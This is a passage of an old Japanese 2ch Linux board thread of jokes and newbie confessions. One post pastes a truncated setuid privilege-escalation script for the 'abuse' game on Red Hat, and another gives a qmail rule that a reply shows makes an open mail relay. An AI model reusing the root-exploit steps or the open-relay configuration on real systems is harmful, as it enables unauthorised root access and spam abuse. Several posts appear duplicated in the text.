%vi hage
:%s/^M$//g
:wq
気分はハカー(プ
自分の厨房さをさりげなく出してみよう
1厨房
NGNG2login:Penguin
NGNG $ emacs crlf2lf
#!/bin/sh
if [ ! -x /usr/bin/nkf ]; then
echo "crlf2lf: Please install nkf"
exit 1
fi
if [ -z $1 ]; then
echo "usage: crlf2lf <filename>" >&2
exit 1
fi
if [ -f $1 ]; then
nkf -Lu $1 > $1.nkftemp
mv -f $1.nkftemp $1
exit 0
else
echo "crlf2lf: No such file"
exit 1
fi
C-x C-c
$ chmod 700 crlf2lf
気分はプログラマー(プ
#!/bin/sh
if [ ! -x /usr/bin/nkf ]; then
echo "crlf2lf: Please install nkf"
exit 1
fi
if [ -z $1 ]; then
echo "usage: crlf2lf <filename>" >&2
exit 1
fi
if [ -f $1 ]; then
nkf -Lu $1 > $1.nkftemp
mv -f $1.nkftemp $1
exit 0
else
echo "crlf2lf: No such file"
exit 1
fi
C-x C-c
$ chmod 700 crlf2lf
気分はプログラマー(プ
NGNG
すみません。消防なのでどこが面白いのか分かりません。
NGNG
rm ーr *、*
NGNG
>>4
イイ!
イイ!
NGNG
7login:Penguin
NGNG >>2
悦に入っていたところにqkcを知ったっていうオチ...?
悦に入っていたところにqkcを知ったっていうオチ...?
NGNG
rootを奪取してみよう。
echo --- gain root on Redhat Linux 2.1
echo --- Cheking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo --- System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/aduser
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo --- Executing Abuse
・・・以下略
しまった! RH 2.1用書いちまった!
echo --- gain root on Redhat Linux 2.1
echo --- Cheking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
then
echo --- System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
#!/bin/sh
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/aduser
_EOF_
chmod +x /tmp/undrv
PATH=/tmp
echo --- Executing Abuse
・・・以下略
しまった! RH 2.1用書いちまった!
NGNG
NGNG
kill -9 6
11login:Penguin
NGNGNGNG
NGNG
自作機にフロッペをインスツールしてみました。でも認識しません
ディスクトップに何も出てこないのです
マウンターを起動してみましたが、使い方がよくわかりませんでした
ディスクトップに何も出てこないのです
マウンターを起動してみましたが、使い方がよくわかりませんでした
14厨房
NGNG ここの低能共は Win2k + Cygwin の最強さをわかってないらしい。(プ
「Winは糞」という馬鹿のひとつ覚えはもう聞きあきたね(プププ
結局のところ自分の無知まるだしでLinuxを使って賢いフリ(ププププププ
内心: われながら論理的で非の打ちどころのない文章だな (フ
「Winは糞」という馬鹿のひとつ覚えはもう聞きあきたね(プププ
結局のところ自分の無知まるだしでLinuxを使って賢いフリ(ププププププ
内心: われながら論理的で非の打ちどころのない文章だな (フ
15login:Penguin
NGNG Win2kで安定して動く、高機能なMP3プレーヤ知りませんか。
WinAmp入れましたが、2時間で落ちてしまい、xmmsはいう
までもなく、Macのitunesよりも遥かに劣る安定度しかあり
ません。
WinAmp入れましたが、2時間で落ちてしまい、xmmsはいう
までもなく、Macのitunesよりも遥かに劣る安定度しかあり
ません。
16ちゅぼう
NGNG ここの低能様は MacOS + MacMiNT の最強さをわかってないらしー
17login:Penguin
NGNG MacMiNTって何?
あ、関係ないけどlinuxって文字選択して中ボタン押すだけでコピペ出来るんだ。
今まで気づかなかった。我ながら見事な消防ぶり(自画自賛)
あ、関係ないけどlinuxって文字選択して中ボタン押すだけでコピペ出来るんだ。
今まで気づかなかった。我ながら見事な消防ぶり(自画自賛)
19login:Penguin
NGNG 家のマシンは.rpmファイルをリアルプレーヤで開こうとします。
20login:Penguin
NGNG startx
21login:Penguin
NGNG xinit
NGNG
FreeBSD で wheel グループでないと su できないのがわからなくて慌てたた。
NGNG
いっつもLIだったのが
010101010101010101…
と症状が変わって嬉しかった
010101010101010101…
と症状が変わって嬉しかった
24login:Penguin
NGNG NICの2枚挿しがしたいんですけど・・・。
25login:Penguin
NGNG bind9.1.xになってからnamedってゆープロセスがたくさん立って困ってるんです。
killした方がよかですか?
killした方がよかですか?
26login:Penguin
NGNG FreeBSDでディレクトリのchmodするときって、chmod go+rx /home/hogehoge/
みたいにケツのスラッシュが必ず要るのね。
みたいにケツのスラッシュが必ず要るのね。
27login:Penguin
NGNG 管理者にvim6入れて、と言おうと思ったけど
小心者で言えなかったので、とりあえずhomeに入れた私は
厨房認定でしょうか?
小心者で言えなかったので、とりあえずhomeに入れた私は
厨房認定でしょうか?
28login:Penguin
NGNG Linuxのリソ−スのほとんどをエロに
当てている僕は厨房ですね。
当てている僕は厨房ですね。
NGNG
>>28
いや、むしろ漢だ。
いや、むしろ漢だ。
30login:Penguin
NGNG MIDI ファイルを解析&作成するためだけに、16進ダンププログ
ラムと、そのダンプリストからバイナリファイルを作るプログ
ラムを作ってしまった。バイナリエディタ拾ってくればいいも
のを....
しかも、気が付いたら dehex が n進数から文字列、コメント
まで対応した妙なものになっていた.... 厨でしょ。
ラムと、そのダンプリストからバイナリファイルを作るプログ
ラムを作ってしまった。バイナリエディタ拾ってくればいいも
のを....
しかも、気が付いたら dehex が n進数から文字列、コメント
まで対応した妙なものになっていた.... 厨でしょ。
31login:Penguin
NGNG 「西村理香」とか「プチトマト」という名前のディレクトリがある。
厨房ですね。
厨房ですね。
32login:Penguin
NGNG >>31
炉浬はあまりにアトミックですよ。ウラン柄杓ですくって掻き回してるみたい
でヤバいですよ。っていうか、少年は大人に惹かれるものですよ。
寝小便してそうなガキは興味無しですよ。[Kumiko_Takeda]とか
[Kanoh_Sisters]というディレクトリならあります。
炉浬はあまりにアトミックですよ。ウラン柄杓ですくって掻き回してるみたい
でヤバいですよ。っていうか、少年は大人に惹かれるものですよ。
寝小便してそうなガキは興味無しですよ。[Kumiko_Takeda]とか
[Kanoh_Sisters]というディレクトリならあります。
NGNG
つーか、工口を格納するディレクトリはとりあえず
. (ドット)を先頭に付けておくべきである。
. (ドット)を先頭に付けておくべきである。
NGNG
35login:Penguin
NGNG つうか普通、やばいのは不可視コード使うだろ。
NGNG
過去に回答があったぞ
/mntに置いといて、使わないときは何かマウントしとけば完璧
/mntに置いといて、使わないときは何かマウントしとけば完璧
37login:Penguin
NGNG38login:Penguin
NGNG ダンプって何だよダンプって
ダンプは車だろ、アホな事書いてねーで学業or仕事しろや
# なかなか痛くて厨(wara
ダンプは車だろ、アホな事書いてねーで学業or仕事しろや
# なかなか痛くて厨(wara
NGNG
あんたセンス良すぎ。
NGNG
は〜ぁ。これだから何も分かってない厨房は…
ダンブといえば松本に決まってるだろうが。
ダンブといえば松本に決まってるだろうが。
NGNG
あん?
もしかして dumpって書いてダンプて
読むとでも?
もしかして dumpって書いてダンプて
読むとでも?
NGNG
>>41
"ドゥンプ"とでも読みたいのか?
"ドゥンプ"とでも読みたいのか?
4330
NGNG 40まではセンス良かったのに、、、
意味不明になっちゃったのでさげ。
意味不明になっちゃったのでさげ。
NGNG
FDクローン便利スギ!
45荒井厨
NGNG LINUXにはPSというフリーソフトがあるが、何故PSとい
う名称なのか?
それはLINUXで動作しているタスクの事をpsと呼ぶからで
ある。*BSDではprocessと呼ぶそうであるが、これは
歴史的な経緯でそう呼ばれているだけに過ぎず、実はこれは誤り
である。
# (フッ…決まったな)
# なんだバカヤロ
う名称なのか?
それはLINUXで動作しているタスクの事をpsと呼ぶからで
ある。*BSDではprocessと呼ぶそうであるが、これは
歴史的な経緯でそう呼ばれているだけに過ぎず、実はこれは誤り
である。
# (フッ…決まったな)
# なんだバカヤロ
46login:Penguin
NGNG 平謝りである
NGNG
NGNG
芸は身を
NGNG
alias dir ls
NGNG
Qmailはセキュリティに強いですが、強すぎてそのままではメールを出せません。
これで悩んだ諸兄!俺は見つけました!(優越感ゾクゾク)
以下のようにしましょう!!
* tcpserver経由でqmail.smtpを呼ぶ場合のコマンドライン例*
# /usr/local/bin/tcpserver -v -u 1007 -g 101 -x /etc/tcp.smtp.cdb 0 smtp /var/qmail/bin/qmail-smtp
* 上記tcp.smtp.cdbの作り方*
# tcprules tcp.smtp.cdb tcp.tmp < tcp.smtp.src
* tcp.smtp.srcの内容 *
------------------------
allow,RELAYCLIENT=""
------------------------
はい!これでQmailでメールが出せます!わははははっ!!
あぶないsendmailなど捨てて、真のセキュアで高速なMTAの実力を味わいましょう!
これで悩んだ諸兄!俺は見つけました!(優越感ゾクゾク)
以下のようにしましょう!!
* tcpserver経由でqmail.smtpを呼ぶ場合のコマンドライン例*
# /usr/local/bin/tcpserver -v -u 1007 -g 101 -x /etc/tcp.smtp.cdb 0 smtp /var/qmail/bin/qmail-smtp
* 上記tcp.smtp.cdbの作り方*
# tcprules tcp.smtp.cdb tcp.tmp < tcp.smtp.src
* tcp.smtp.srcの内容 *
------------------------
allow,RELAYCLIENT=""
------------------------
はい!これでQmailでメールが出せます!わははははっ!!
あぶないsendmailなど捨てて、真のセキュアで高速なMTAの実力を味わいましょう!
51sendmailer
NGNGNGNG
タスクスケジューラ?
NGNG
NGNG
>>53
トリップつけるほどその名前に誇りを持ってたの?
トリップつけるほどその名前に誇りを持ってたの?
NGNG
NGNG
>>50
ネタにマジレスするのもアレなんだが、それだとやっぱりメールは出せないぞ。
$ cat env.sh
#!/bin/sh
set
↑こういうシェルスクリプトを作って、
$ tcpserver -x tcp.smtp.cdb 127.0.0.1 10000 /somewhere/env.sh
で起動して、
$ telnet localhost 10000
を実行したときに、RELAYCLIENT がどうなるか見てみるとよい。
ってゆーか、↓こうやっちゃったんだよね。コロン重要。
:allow,RELAYCLIENT=""
これだと open relay になって spammer がわらわらやってくる。>>51
ネタにマジレスするのもアレなんだが、それだとやっぱりメールは出せないぞ。
$ cat env.sh
#!/bin/sh
set
↑こういうシェルスクリプトを作って、
$ tcpserver -x tcp.smtp.cdb 127.0.0.1 10000 /somewhere/env.sh
で起動して、
$ telnet localhost 10000
を実行したときに、RELAYCLIENT がどうなるか見てみるとよい。
ってゆーか、↓こうやっちゃったんだよね。コロン重要。
:allow,RELAYCLIENT=""
これだと open relay になって spammer がわらわらやってくる。>>51
NGNG
OS/400の同人誌を(以下省略)
60login:Penguin
NGNG61basashi
NGNG 厨房ってなんですか?
はじめて来たんですけど意味が分からない言葉が多くって。
はじめて来たんですけど意味が分からない言葉が多くって。
62login:Penguin
NGNG >>61
おまえのことだよ。ププ
おまえのことだよ。ププ
63basashi
NGNG 了解!
NGNG
>>61
料理をするところ。詳しくは広辞苑を見よ。
料理をするところ。詳しくは広辞苑を見よ。
65basashi
NGNG 突然odnから[email protected] (TOMATO)
のmailがとんできました。そのあといきなりipchains
がすべてDENYになってしまいました。
やられちゃったみたいです。みなさんすごい人達なんです
ね?おてやわらかに。
のmailがとんできました。そのあといきなりipchains
がすべてDENYになってしまいました。
やられちゃったみたいです。みなさんすごい人達なんです
ね?おてやわらかに。
NGNG
>>65
それは良かったですね
それは良かったですね
67login:Penguin
NGNG 25 17 * * 5 echo 'kernel panic: hogehoge'
68login:Penguin
01/10/08 19:42ID:JLpukcbo ここを使うか・・・・・
01/10/09 07:48ID:h3S4OjCg
>>68
何に使うんだろう・・・
何に使うんだろう・・・
70login:Penguin
01/10/10 00:00ID:aW85.XPI ねえねえお隣さん。
お醤油貸してくださいな。
お醤油貸してくださいな。
01/10/10 02:33ID:v68sQ4g.
人名は出したくないが悪寒の走る68だな
レスを投稿する
ニュース
- 【実況】サッカーW杯 1次リーグF組『日本 vs スウェーデン』 NHK総合 8:00~ ★5 [冬月記者★]
- 【W杯】日本はF組2位で3大会連続決勝T進出 1回戦で王国ブラジルと激突 スウェーデンと1-1ドロー [阿弥陀ヶ峰★]
- 【W杯】日本はF組2位で3大会連続決勝T進出 1回戦で王国ブラジルと激突 スウェーデンと1-1ドロー ★2 [恐縮です★]
- 【W杯】日本はF組2位で3大会連続決勝T進出 1回戦で王国ブラジルと激突 スウェーデンと1-1ドロー ★3 [恐縮です★]
- 【サッカー】日本×スウェーデン戦 小中学校も異例の特別対応!「体育館でPV」「みんなで試合中継」「授業を変更して朝から観戦」★2 [冬月記者★]
- 【サッカー】長友佑都、5大会連続の出場に万感「W杯はマンマミーア」 後半途中から出場 左サイドで存在感 [冬月記者★]
- 【地上波/DAZNほか】 FIFAワールドカップ2026 総合スレ★196【メキシコ/カナダ/アメリカ】
- 【地上波/DAZNほか】 FIFAワールドカップ2026 総合スレ★197【メキシコ/カナダ/アメリカ】
- 【DAZN専用】日本-スウェーデン ★1
- メシ専 ★4
- 【酒】2026W杯 実況★3
- 【マターリ】日本vs端典
- ワールドカップ日本代表高速感想スレ4 [126042664]
- 【NHK/DAZN】FIFAワールドカップ2026 日本vsスウェーデン★4
- 【超緊急】サッカー⚽次戦 ブ ラ ジ ル 🇧🇷 [344263159]
- 韓国敗退WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW [398059782]
- 法務省、戸籍法施行規則を改正。人名用漢字に「勒」の1文字を追加 [663766621]
- 【速報】日本vsスウェーデン 引き分け [509448172]